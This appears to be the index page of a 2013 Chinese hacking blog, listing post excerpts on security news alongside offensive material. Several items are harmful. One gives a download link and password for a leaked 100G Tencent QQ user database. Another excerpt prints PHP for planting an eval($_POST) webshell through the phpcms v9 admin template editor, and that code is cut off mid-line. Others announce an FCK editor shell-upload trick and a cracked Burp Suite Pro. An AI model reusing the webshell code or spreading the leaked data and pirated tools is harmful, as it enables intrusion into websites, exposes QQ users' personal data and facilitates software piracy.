七行者博客 - 关注网络安全,黑客技术爱好者

  • 100G的腾讯QQ数据库

    100G的腾讯QQ数据库
    漏洞具体详情:http://www.wooyun.org/bugs/wooyun-2013-043251   外界已经有下载地址了,迅雷上就可以看到很多用户数据泄漏,可能是早期的漏洞被利用抓取的经历等等。 下载地址:http://pan.baidu.com/s/1mrBuk            提取密码:gvfx 阅读全文
    作者:qxz_xp | 发布:2013年11月20日 | 分类:社工相关, 黑客攻防 | 48条评论
    阅读全文

  • 黑客发现漏洞 微软Silverlight用户再次面临恶意攻击

    黑客发现漏洞 微软Silverlight用户再次面临恶意攻击
    微软Silverlight用户再次面临恶意攻击,因为黑客在Silverlight中发现了一个漏洞。   Malwarebytes高级安全研究员Jerome Segura发现了这一漏洞,并警告说全球的黑客正在利用这个Angler exploit kit入侵运行Silverlight的电脑。   事实证明,5.1.20125.0之前的版本更容易早入侵,因此所有的用户应该尽快升级到最新的版本。       同时,该安全研究员还提醒到,Silverlig...阅读全文
    作者:qxz_xp | 发布:2013年11月18日 | 分类:漏洞公布, 网络安全 | 暂无评论
    阅读全文

  • FBI警告美国政府:黑客团体“匿名者”入侵机构电脑

    FBI警告美国政府:黑客团体“匿名者”入侵机构电脑
               11月17日消息,据路透社报道,本周FBI对美国政府发出警告,“匿名者”黑客团体已经秘密侵入美国政府多个机构的电脑中窃取敏感信息,他们的行动已持续了几近一年之久。            据路透社所接触的FBI备忘录称,去年12月份起,黑客利用Adobe软件漏洞,发动数次入侵,并预留“后门”通道,以便黑客重返电脑系统。近期的一次入侵行为发生在今年10月份。 备忘录将这些...阅读全文
    作者:qxz_xp | 发布:2013年11月18日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • FCK突破建立文件夹后台拿shell

    FCK突破建立文件夹后台拿shell
             今天准备搞一个站,在此站搞了一翻后发现此站没有找到可利用的漏洞,此时就有点感觉蛋疼了,所以就想找个旁站来提权,扫描了一下旁站 我靠没有几个站点,后来在经过一翻努力下,终于还是登录进了一个站的后台,在后台瞧了一会,发现是FCK编辑器,哈 有点希望了,马上想到用FCK的突破建立文件夹的漏洞试下。下面就写下FCK突破建立文件夹后台拿shell方法,这个百度里...阅读全文
    作者:qxz_xp | 发布:2013年11月18日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
    阅读全文

  • 记一次phpcms v9后台拿shell过程

    记一次phpcms v9后台拿shell过程
    记一次phpcms v9后台拿shell过程 登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图: 然后点击 search 这个文件夹,如下图: 然后点击修改 index.html 文件 然后把以下代码复制上去提交。 <? $fp = @fopen(“qxz.php”, ‘a’); @fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST...阅读全文
    作者:qxz_xp | 发布:2013年11月17日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 3条评论
    阅读全文

  • 全球顶级黑客 30秒破苹果手机系统

    全球顶级黑客 30秒破苹果手机系统
      昨天,来自上海的碁震云计算安全研究团队(KeenTeam)在日本东京举办的全球顶级安全竞赛Pwn2Own上,在不到30秒的时间内成功攻破苹果最新手机操作系统iOS 7.0.3,这距离苹果发布iOS7.0.3只有二十天。KeenTeam也因此成为全球首支远程攻破iOS 7.0.3的安全团队,同时也是中国安全专业团队第一次参加该比赛并获胜。   Pwn2Own是全球最著名的黑客大赛之一,由美国五角大楼入...阅读全文
    作者:qxz_xp | 发布:2013年11月15日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • SJ银赫晟敏SNS被黑 黑客发文贴承认是其所为

    SJ银赫晟敏SNS被黑 黑客发文贴承认是其所为
    最近SuperJunior成员银赫的推特连续被黑,黑客用其账户连续上传了数张裸体女性照片,并公开该女性身份称其为参加某选秀节目的H某。近日,在韩国某保守倾向在线网站(ilbe)上出现了一篇承认盗用银赫账户的文章。 14日上午,ilbe上出现了一篇题为“我是在银赫哥SNS上传裸照的H某的前男友”的文章。网名为“朴宰XX”的文章发布者称“我为什么做这种事,这是包含了我心声的照片”,并...阅读全文
    作者:qxz_xp | 发布:2013年11月15日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • burpsuite_pro_v1.5.11 破解版

    burpsuite_pro_v1.5.11 破解版
    Burp Suite是一个Web应用程序集成攻击平台,它包含了一系列burp工具,这些工具之间有大量接口可以互相通信,这样设计的目的是为了促进和提高整个攻击的效率。平台中所有工具共享同一robust框架,以便统一处理HTTP请求,持久性,认证,上游代理,日志记录,报警和可扩展性。  BurpSuite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。这些不同的burp工具通过...阅读全文
    作者:qxz_xp | 发布:2013年11月14日 | 分类:黑客工具, 黑客攻防 | 暂无评论
    阅读全文

  • 美国大学生黑客入侵女孩电脑拍裸照勒索

    美国大学生黑客入侵女孩电脑拍裸照勒索
     东方网11月14日消息:美国南加州一名19岁大学生非法进入数十名女孩电脑,并用她们的电脑摄像头拍摄女孩裸照进行勒索,其中包括他的高中同学、2013年美国妙龄小姐。这名学生被判入狱服刑。   南加州河滨市的《企业新闻报》和《洛杉矶时报》报道称,在大学学习电脑的杰瑞德·詹姆斯·亚伯拉罕从2012年初至2013年6月期间,非法进入一些年轻女孩的电脑,在这些女孩完全不知的...阅读全文
    作者:qxz_xp | 发布:2013年11月14日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 天蝎Web安全渗透漏洞工具集Scorpio Pro 5

    天蝎Web安全渗透漏洞工具集Scorpio Pro 5
    天蝎座web安全渗透测试工具集 ScorpioV5 软件截图: 更多功能等待基友们自行发现。 插件更新功能,后面的功能大家只要更新插件即可。 运行环境: windows xp,win7,win8, + .net4.0 解决win8崩溃问题 解决杀软报毒问题 功能不会用?请点击每个功能窗口的帮助。 也可以查看目录里的 实例说明。doc文档 下载地址:http://pan.baidu.com/s/17V5WV 阅读全文
    作者:qxz_xp | 发布:2013年11月12日 | 分类:黑客工具, 黑客攻防 | 2条评论
    阅读全文